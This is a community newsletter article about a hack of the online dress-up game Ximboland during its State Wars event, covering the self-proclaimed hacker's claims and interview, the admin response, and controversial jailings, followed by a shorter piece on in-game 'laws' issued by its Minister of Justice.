State Wars Hacked, Ends 3 Days Early, Prompts Strike & Ban Wave

By LittleMissRachie | April 26 2025

Overnight US time during day 3 of State Wars: Pretty in Pink, a 24-hour old account without citizenship had accumulated and spent two million State Wars points. The hacker appears to have had admin level access, as the account was able to continue "earning" and spending points from jail, and further, from a banned account, signalling for many issues with Ximboland's security forces and infrastructural durability in times of strife.

On Easter Sunday, April 20th, by 10:30PM players noticed something awry. As early as 9pm, and within 24 hours of the account’s creation, user nullplayer, supposedly a Secvillian, had reached level 21 and somehow accumulated more than two hundred seventy thousand State Wars points. By 9:35, almost half a million points and level 29. At first, state groups were thankful this hacker hadn’t spent those points. They had spoken too soon. Soon after, this account direct spent all its points and exploited a win for Seville, which was in last place.

Answers? And a gripe with management

At 3:16 Ximboland time, user notnullplayer, claiming to be the hacker, brigaded every recent topic in the forum with a reply linking to a topic: Nullplayer’s Guide to Breaking Ximboland’s Security (and Free Diamonds for All). This post maligns Ximboland’s lack of rate limits, hence the mass-posting, likely with a script according to their posts, first to the state town halls and then in reply to all of the top threads in the forums, totalling 13 pages of posts on the profile. The post goes on to outline explicitly the tools used to exploit the website, and as a result, will not be linked to, quoted in its entirety here, nor available to view. To be taken with a grain of salt, the purported hacker’s Q&A is outlined below, in response to questions posed by user kimjongin:

Was[sic] the security breach been contained?

No, it wasn’t. It's been over a day and I haven’t seen a single line of code changed. Hopefully this post puts some pressure on the admins to actually do something.

Is our data safe?

Kind of — but not entirely. Passwords are encrypted, sure, but if an attacker gets access, they’re still vulnerable. And yes, SQL injection is still possible in this game.

(Don’t worry about payments - if I wanted money, I'd just threaten the admins. Way easier.)

Are our private outfits protected?

No. I'm determined enough to prove there’s a flaw, but not unemployed enough to actually write a script for a mass outfit change (but I could).

Interestingly, notnullplayer adds a final and personal jab at the outgoing Minister of Justice, KatieBoutique, who rallied multistate support against the hacked end to State Wars. KatieBoutique is a Reasonopian, who shared the lead with Freethinkerland and Agnostica early in the Pretty and Pink War, and was understandably enraged by the exploitation of State Wars.

Is Katie/Kate (whatever) a bitch?

Yes. Painfully so. She’s living proof of poor management — like it wasn’t obvious already.

This arguably signals that the hacker may be more familiar with Ximboland than they claim.

They outline the exploits used in what sounds like an older version of Ximboland; “Back then, I noticed some pretty serious security issues in the game. It seems to me that admins were aware, but didn’t do anything to fix them.” According to the post, “One major flaw let me inject JavaScript into fields like bios and signatures, which means anyone who viewed my profile or forum signature would unknowingly run scripts in their browser.”

The hacker claims “the game relies heavily on JavaScript for its client-side functionality,” and that as a result, “this kind of vulnerability could’ve let me silently steal sessions (including admin accounts) or perform actions as if I were them (like banning players without needing admin access, directly from their accounts, without any logs).” Simply put, the hacker could have run programs on user computers, through their bio or signature on a post in the forums. By viewing the post or profile without even the need to click a link, this hacker could allegedly access the outfits and profiles of users, even potentially changing user passwords. notnullplayer goes on, “just by posting on the forum, I could’ve gained full control over all accounts who saw my posts or visited my profile.”

According to Minister of Entertainment Tibby, the attack was an SQL injection, and that they did in fact have an active script in their signature at one point. “inspecting nullplayer's signature, it seems they turned the script off, for now” and speculates that this “is also why some people were and some people werent impacted,” and that “only those who looked at the posts while the script was on were vulnerable to those specific attacks.” A comment reply stands out from user replytotibby, claiming that not to be the case. The self proclaimed hacker purported that while the website is vulnerable to these kind of SQL attacks, even now, that was not what the destruction of outfits was.

“I didn't use any of them. The javascript thing I told about on the post was fixed back then, years ago, just as I said I didn't make any posts with javascript on the signature. I clearly said SQL injections are possible, but I never used it. I also wouldn't need any player to do anything if I was to use it. I didn't spoof anything as well, pretending to be on other players' account. I just directly saved them from the API.”

Outfits were directly manipulated, turned into the silhouette featured for private outfit thumbnails, and the unsettling default Ximbo outfit featuring sunglasses and a black and yellow ensemble. The outfits of high profile figures in State Wars and the leaderboards, as well as Pink House officials, were targeted. The author of this article reached out to the yet-to-be-jailed account replytotibby, which had outlined the tools they used to hack the website in the Xeet replies to Minister of Entertainment Tibby, and was able to secure the answers to a few questions. Granted, these responses are in the words of the self-proclaimed hacker themselves, and are to be read with healthy skepticism. The interview is below, and is copy and pasted in its entirety, typos and all.

Interview with replytotibby

What were your intentions in hacking the site? What message do you want to send?

 Not really much, I just want those problems fixed. As I said on the post, besides the fun of it (coding bots, wrecking havoc, causing chaos and seeing people's

reactions), I dislike irresponsible admins and lazy devs.

Why destroy peoples’ outfits?

I just wanted to show it's possible. Just messing with the war rankings seems too bland.

How did you choose whose outfits would be nullified?

I chose the most active ones, the ones who apparently were online the most, xeeting and participating on events. It seems to me that there is a specific group of players who know each others well and play a lot. And Katie because she's a disgrace to management. I used to be an admin for other games and website communities too, and I was proud of what I did. She just seems to want control over people. I also focused on people who annoyed me slightly or were really focused on the whole situation, as well as went completely random on some people, or used them to re-test the script.

What made you choose state war as a specific event to hijack?

I didn't hehe but I saw the chance for some fun on it because it seemed like a major event.

How do you know Katie? You referenced her personally.

After hacking I kept checking the website for the admins' reaction and players' as well, which is where most of the fun lies.

When did you first play Ximboland, and how would you describe the state of site safety then?

I can't tell when I first played becuase that could, maybe, tell on me, but it has passed some years since then. Site safety was the same as now - exactly the same, nothing changed. New games, however, do seem a bit safer than old ones (or I just don't know sliding puzzle works and don't have the patience to try)

Unfortunately the user doesn’t go into detail on their history with the site, leaving investigators with few clues into their identity. They claim the attack isn’t driven by personal vengeance, but little is known of their relationship to Ximboland.

The response

This and the provided javascript signals that anyone could gain access to player outfits, forum functionality and other functions like State Wars. What remained unknown for more than a week is the full extent of the vulnerability in 2025. SweetasNuts had not commented on the specific vulnerabilities of the site, nor had admin Mariolka and Sachem, until 6 days later, the 26th.

After the popular jailing of nullplayer, citizens were widely in support of Minister KatieBoutique, commenting widely in thanks for doing what she could to stop the hacker with the tools available to the Ministry of Justice. Replies to MoJ’s Xeets on the 20th are rife with comments like “Thank you Katie! ❤️” from user TokiKonoe, “rare katie W” from user alexa pro, and other cheers for the chief of the Fashion police.

The first official response came from Prime Ximbo and reigning autocrat SweetasNuts on the 21st, a post titled Ximboland is under attack. In it, the Prime Ximbo is vague about the attack, providing information whose relevance is argued in the replies: “Preliminary reports from the Minister of defence suggest that this was an act of treason from someone whom knows about Ximboland from within rather than an act of war from a foreign land. It goes without saying that when we catch the traitor then their punishment for this will be the complete deportation from Ximboland into permanent exile and we will notify the relevant legal authorities of their new homeland for illegally hacking into a private property. Justice will be served.”

The post provided no information about how the hack was possible, or what steps were being taken to secure the site. But the autocrat was quick to assuage nerves about the security of payment information. “A reminder that we store ZERO banking information in Ximboland so there is no information that you share with us that could be valuable to hostile foes like the idiot killjoy who did this. We use a 3rd party payment provider (paypal) exactly for this reason ie we have nothing of particular value to anyone. So please dont worry.” This comes despite the fact that PayPal authorizations may very well be vulnerable as well.

With no direction for Pink House officials or guidance on what game features were safe, confusion and uncertainty loomed, on the 21st, chaos continued to spread. The outgoing Minister of Justice, with less than two weeks remaining in their term, Xeeted plans for jailings, on the grounds that “The leftists … brought The Hacker here, whether directly, or indirectly, through your actions, Xeets, attitudes, and glorifications of hatred, drugs, violence, and death.”

These arbitrary jailings were going to take place according to KatieBoutique, until Administration reached out to MoJ with instructions.

“I am not done jailing people on the left who brought The Hacker here, whether directly, or indirectly. Until the admins figure out what to do…and let me know what they want me to do, I will continue jailing people as I see fit.” The reaction had changed swiftly.

“Nope. Wasn’t that. I don’t care if you’re trying to rage bait, trying to blame other users on the site when this is very clearly a failing of Chris/SAN and admin isn’t productive and sure as shit won’t get you your money back,” wrote user Katrynah.

“Come on, I don't think they brough the hacker, this jailing is completely unjustified and undeserved ... People will just start deleting their accounts and the game will not be fun anymore :(“ Wrote user Isolde.

Things escalated from there. Minister of Justice KatieBoutique then jailed Minister of Entertainment Tibby, claiming she was “on good terms with The Hacker,” going on to threaten her with indefinite jailing until the end of the term in May. Freethinkerland General KirstyD8 commented criticizing the jailing. “I think they need to be able to communicate with Chris and they can't do that in jail. Mostly Tibby.”

The Minister of Justice posted public accusations that the hack was done by the boyfriend of former PX bxdcherri. No evidence was provided, but bxdcherri was banned permanently by Administration soonafter.

Since then, Minister of Construction, coder Sachem, on April 23 responded to the hack claiming a full rollback would be performed, leaving users nervous about the progress they had made since Sunday. The Minister assured the citizenry they were hard at work determining the problem. Thankfully, since then, Sachem's next post was a full recovery plan, clarifying that the specific exploits available to exploit Ximboland would be repaired: " We take this extremely seriously, and we want to reassure you that these attack vectors have been fully identified and patched." It outlines what changes have been made and outlines the technical fixes involved.

This unnerving and controversial series of events, following shortly after the sitewide shock in response to threats of the publication of revenge porn, led to the publication of a series of protest items in the shops. The item’s publication led to several permanent bannings. More on this in the next issue of the Bimbo City Breaking.

View on Ximboland

BREAKING: Ministry of Justice Lays Down New Outfit "Rules", Latest in Slew of Unprecedented New Guidelines and Jailings

by LittleMissRachie | April 3 2025 In another sweeping declaration, Minister of Justice Katie Boutique has implemented another of what she calls "laws." These come in the face of recent Ministry ministry orders against the use of the Don't Vote Me, I'm Only Helping signs, available in the shop, in more than one fight outfit. The latest rule says because Bimboland is a legal entity within Great Britain, that British law, which forbids handguns, ought to apply in the pngs users adorn their avatars with. According to the order posted via Xeet, "Openly brandishing a handgun in your #1 slot avatar outfit will get you immediate jail." The order is seen as an overreach by many. The replies contain mostly disapproval, from a resounding "NOOOOOOOOOOOOOOOOOOOO" from user @Katrynah, to other comments regarding British law and the ruling itself. One comment reads from user @cannabisbimbo reads, "this shit is so fucking goofy". While British law governs against private ownership of handgun firearms, it also allows for the artistic representation of anything that adheres to the region's strict defamation laws. Whether the community-curated shop item PNGs made by volunteer artists counts as "artistic representation," or as the private ownership of firearms, is up for debate.  

This new “law” comes in the wake of various others, including banning counting games in activity chats, and banning the Don't Vote Me" signs. And immediately following were several widely criticized jailings, of users including @LoveSoldier, @moonflower, and @GuGuMuMu, as well as the author of this bulletin. Citations include Gemima counting, criticizing the outfits of pro-Zionist players, and what the Minister cited as a violation of the guidance regarding "treason against the independent state known as the Fashionable Republic of Ximboland," in the form of pro-Palestine messages in profiles and Xeets, as well as the act of criticizing the outfits of pro-Zionist Bimbos. Most, if not all of these "laws" are codified not in the forum, but Xeets, which leaves many users to wonder if laws can or should be made in a format fewer Bimbos get to see, and whether or not the Minister of Justice is acting within her jurisdiction.

More on this and the self-proclaimed Minister of Tyranny, tonight at 11.

View on Ximbo.land